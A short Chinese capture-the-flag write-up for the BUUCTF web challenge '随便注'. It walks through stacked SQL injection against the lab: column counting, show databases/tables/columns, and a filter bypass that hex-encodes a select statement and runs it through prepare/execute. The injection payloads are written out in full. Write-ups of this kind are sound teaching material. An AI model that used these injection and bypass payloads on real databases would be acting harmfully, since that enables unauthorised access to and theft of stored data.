BUUCTF--WEB 随便注 1

随便注1

打开题目,我们插入1‘ 发现存在注入,于是乎我们使用sqlmap一顿嗦,但是是失败的。于是乎,尝试手工注入。
1’ order by 1,2# 发现存在两个字段
BUUCTF--WEB 随便注 1_第1张图片
于是我们使用联合查询,发现被禁了。
BUUCTF--WEB 随便注 1_第2张图片
于是乎,我们尝试使用堆叠注入。
1’;show databases; #
1’;show tables; #
得到数据库和表名。
BUUCTF--WEB 随便注 1_第3张图片
于是乎,我们查出表中数据:1’;show columns from 1919810931114514;#
BUUCTF--WEB 随便注 1_第4张图片
可知flag字段的值即为目的
因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码
再通过构造payload,得1’;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
BUUCTF--WEB 随便注 1_第5张图片

你可能感兴趣的:(CTF)